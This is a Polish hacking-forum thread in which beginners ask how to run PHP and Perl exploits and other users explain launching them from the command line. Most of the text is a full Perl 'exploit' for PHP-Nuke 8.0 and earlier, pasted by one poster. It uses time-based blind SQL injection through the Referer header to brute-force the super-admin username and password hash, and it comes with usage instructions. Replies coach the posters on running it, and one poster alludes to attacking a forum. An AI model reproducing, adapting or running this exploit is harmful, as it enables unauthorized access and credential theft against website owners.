Jak używać exploitów w php

Dante#

Użytkownik
Dołączył
Wrzesień 28, 2007
Posty
11
Witam, chcialem sie zapytac jak używać exploitow pisanych w php, zaczynających sie od #!/usr/bin/php.
 

Dante#

Użytkownik
Dołączył
Wrzesień 28, 2007
Posty
11
nie moge zrobic tego jakos inaczej, np przez linie komend? na youtubie widzialem tez film jak gosc robi to przy pomocy mozilli. a jak juz musze wrzucac na serwer to moze byc moj czy ten na ktorym stoi forum, bo jesli ten na ktorym stoi forum to moze byc problem.
 

abramakabra

Były Moderator
Dołączył
Marzec 16, 2003
Posty
1191
Wrzuć to byle gdzie, żeby tylko obsługiwało php albo ściągnij sobie jakiś serwer z php i odpal u siebie na kompie (np. Krasnal) .
 

Dante#

Użytkownik
Dołączył
Wrzesień 28, 2007
Posty
11
a jak chce to odpalic np na servie yoyo to wystarczy ze po prosru wgram ten plik na swoje ftp za pomoca jakiegos klienta ?

Edit: zaladowlaem na swoj serwer plik index.php i po wejsicu na strone wyskakuje cos takiego
Parse error: syntax error, unexpected ',' in /var/www/sites/yoyo.pl/s/p/spr92/index.php on line 205[/b]
O co chodzi?
 

Dante#

Użytkownik
Dołączył
Wrzesień 28, 2007
Posty
11
no dobra le jak juz mam to wgrane to mi wyskakuje Parse error: syntax error, unexpected ',' in /var/www/sites/yoyo.pl/s/p/spr92/index.php on line 205 Chciałbym sie tego dowiedzieć dla poszerzenia wiedzy bo admin oddal forum dobrowolnie
smile.gif
 

eddy3291

Użytkownik
Dołączył
Kwiecień 3, 2005
Posty
52
Jeśli na początku kodu exploita jest "usr/bin/php" to odpalasz go z lini komend, a konkretnie przez php.exe przy zainstalowanym Krasnalu. Jeśli zaczyna się od ?> albo ?php> to odpalasz go poprzez przeglądarke.
Pozdrawiam
 

eddy3291

Użytkownik
Dołączył
Kwiecień 3, 2005
Posty
52
Originally posted by KangurX
takie glupie pytanie ale jak obslugiwac z lini komend?
smile.gif


niemialem nigdy do czynienia z exploitami

Najpierw trzeba mieć np. Krasnala
w linii komend wpisujesz c:usrkrasnalphpphp.exe (-to jest domyslna sciezka) [ścieżka do exploita np. d:exploityexploit.php

I później działasz zgodnie z jego instrukcją.
Pozdrawiam.
 

eddy3291

Użytkownik
Dołączył
Kwiecień 3, 2005
Posty
52
Masz odpalić php.exe i jako parametr wpisać ścieżkę exploita, np.:
Kod:
C:usrKrasnalphpphp.exe d:exploitexploit.php
I to wszystko razem
Pozdro
 
K

KangurX

Gość
ale exploit jest w perlu a raczej ten:

Kod:
#!/usr/bin/perl 

#0day exploit for PHP-nuke <=8.0 Final

#Blind sql injection attack in INSERT syntax

#version for mysql >= 4.0.24, using 'brute force'

#Coded by:Maciej `krasza` Kukla[[email protected]]

#Screenshot:

#0day exploit for PHP-nuke <=8.0 Final

#Sql injection attack in INSERT syntax

#Coded by:Maciej `krasza` Kukla[[email protected]]

#

#[+]Time normal query: 2 seconds

#[+]Length user's record: 5

#[+]Length password's record: 32

#[+]Login:

#admin

#[+]Password:

#b481ab90de84a345c665f1e4ef3c2

#[+]Super admin:

#admin:b481ab90de84a345c66585e1f4cf16e4

use strict;

use warnings;

use LWP;

my $offset=4;#It is the most important variable!!

my $adres=shift or help();

my $ua = LWP::UserAgent->new;

my $zadanie = HTTP::Request->new(GET => $adres);

my ($respone,$komenda,$poczatek,$koniec,$czas_nor,$i,$j,$dlugosc_user,$user,$has
h,$referer,$czy_dziala,$znak);

banner();

$czas_nor=polacz("http://www.krasza.int.pl");

print "[+]Time normal query: $czas_nor secondsn";

$dlugosc_user=ustal_dlugosc("aid",8);

print "[+]Length user's record: $dlugosc_usern";

print "[+]Length password's record: 32n";

print "[+]Login:n";

$user=brute_force_aid($dlugosc_user);

print "[+]Password:n";

$hash=brute_force_pass(32);

print "[+]Super admin:n";

print "$user:$hashn";

##

sub brute_force_pass{

    my ($dlugosc)=@_;

    my ($i,$j,$referer,$wynik,$dolny_zakres);

    for($i=1;$i<=$dlugosc;$i++){

        for($j=48;$j<=122;$j++){

        $referer="http://www.krasza.int.pl'),(-1,(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*";

            $czy_dziala=czy_dziala($referer);

                if($czy_dziala==1){

                    $znak=chr($j);

                    print "$znak";

                    $wynik.=$znak;

                if($i<$dlugosc){

                    $i+=1;

                    $j=47;

                }else{

                    last;

                }

            }

            #przeskok-optymalizacja;]

            if($j==57){

                $j=96;

            }

        }

    }

        print "n";

        return $wynik;

}

sub brute_force_aid{

        my ($dlugosc)=@_;

        my ($i,$j,$referer,$wynik,$dolny_zakres);

        for($i=1;$i<=$dlugosc;$i++){

                for($j=48;$j<=122;$j++){

                $referer="http://www.krasza.int.pl'),(-1,(SELECT IF((ASCII(SUBSTRING(`aid`,".$i.",1))=".$j.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*";

                $czy_dziala=czy_dziala($referer);

                        if($czy_dziala==1){

                    $znak=chr($j);

                                    print "$znak";

                    $wynik.=$znak;

                if($i<$dlugosc){

                                    $i+=1;

                    $j=47;

                }else{

                    last;

                }

                        }

            if($j==57){

                $j=64;

            }

            if($j==90){

                $j=96;

            }

                }

        }

                print "n";

                return $wynik;

}

sub ustal_dlugosc{

    my ($pole,$len)=@_;

    my ($referer,$narazie_dziala_liczba,$nie_dziala_liczba);

    $narazie_dziala_liczba=0;

    $nie_dziala_liczba=65;

    #for($len=1;$len<64;$len++){

    while($len<=64){

        if($narazie_dziala_liczba==$len || $nie_dziala_liczba<=$len){

            return $narazie_dziala_liczba;

        }

        $referer="http://www.krasza.int.pl'),(-1,(SELECT IF((LENGTH(`".$pole."`)>".$len.") & 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=1))/*";

        $czy_dziala=czy_dziala($referer);

        if($czy_dziala==1){

            $narazie_dziala_liczba=$len+1;

            $len+=2;

        }else{

            $nie_dziala_liczba=$len+1;

            $len-=1;

        }

    }

    print "[-]Exploit Failedn";

    exit;

}

sub czy_dziala{

    my ($refik)=@_;

    my $czas_zapytania;

    $czas_zapytania=polacz($refik);

    if($czas_zapytania>$czas_nor+$offset){

        return 1;

    }else{

        return 0;

    }

}

sub polacz{

    my ($referrer)=@_;

    my ($czas,$czas_poczatek,$czas_koniec);

    $zadanie->referer($referrer);

    $czas_poczatek=time();

        $respone=$ua->request($zadanie);

        $respone->is_success or die "$adres : ",$respone->message,"n";

        $czas_koniec=time();

    $czas=$czas_koniec-$czas_poczatek;

    return $czas;

}

sub banner{

    print "0day exploit for PHP-nuke <=8.0 Finaln";

        print "Blind sql injection attack in INSERT syntaxn";

    print "version mysql >= 4.0.24, using 'brute force'n";

        print "Coded by:Maciej `krasza` Kukla[[email protected]]nn";

}

sub help{

    print "0day exploit for PHP-nuke <=8.0 Finaln";

    print "Blind sql injection attack in INSERT syntaxn";

    print "version mysql >= 4.0.24, using 'brute force'n";

    print "Coded by:Maciej `krasza` Kukla[[email protected]]n";

    print "Use:n";

    print "tperl exploit.pl [url]n";

    print "t[url]-vicitim webpage with index.phpn";

    print "Example:n";

    print "tperl bruteforce.pl http://phpnuke.org/index.phpn";

    exit(0);

}

Pomóż
 

eddy3291

Użytkownik
Dołączył
Kwiecień 3, 2005
Posty
52
No to ściągasz komponent Perla stąd i robisz analogicznie do exploita w php, tzn.:
Kod:
C:perlbinperl.exe d:exploitexploit.pl
Pozdrawiam
 

Koksu

Użytkownik
Dołączył
Październik 18, 2007
Posty
2
Originally posted by eddy3291+--><div class='quotetop'>CYTAT(eddy3291)</div>
<!--QuoteBegin-KangurX
takie glupie pytanie ale jak obslugiwac z lini komend?
smile.gif


niemialem nigdy do czynienia z exploitami

Najpierw trzeba mieć np. Krasnala
w linii komend wpisujesz c:usrkrasnalphpphp.exe (-to jest domyslna sciezka) [ścieżka do exploita np. d:exploityexploit.php

I później działasz zgodnie z jego instrukcją.
Pozdrawiam.[/b]

Skąd wziąść tego krasnala?
 

akselekbezelek

Użytkownik
Dołączył
Czerwiec 4, 2007
Posty
334
Originally posted by Koksu+--><div class='quotetop'>CYTAT(Koksu)</div>
Originally posted by eddy3291@
<!--QuoteBegin-KangurX

takie glupie pytanie ale jak obslugiwac z lini komend?
smile.gif


niemialem nigdy do czynienia z exploitami


Najpierw trzeba mieć np. Krasnala
w linii komend wpisujesz c:usrkrasnalphpphp.exe (-to jest domyslna sciezka) [ścieżka do exploita np. d:exploityexploit.php

I później działasz zgodnie z jego instrukcją.
Pozdrawiam.

Skąd wziąść tego krasnala?[/b]
pierwsza strona wpisane w gooogle.pl i jest ;] jesli nie ma wpisz activ perl
 
Do góry Bottom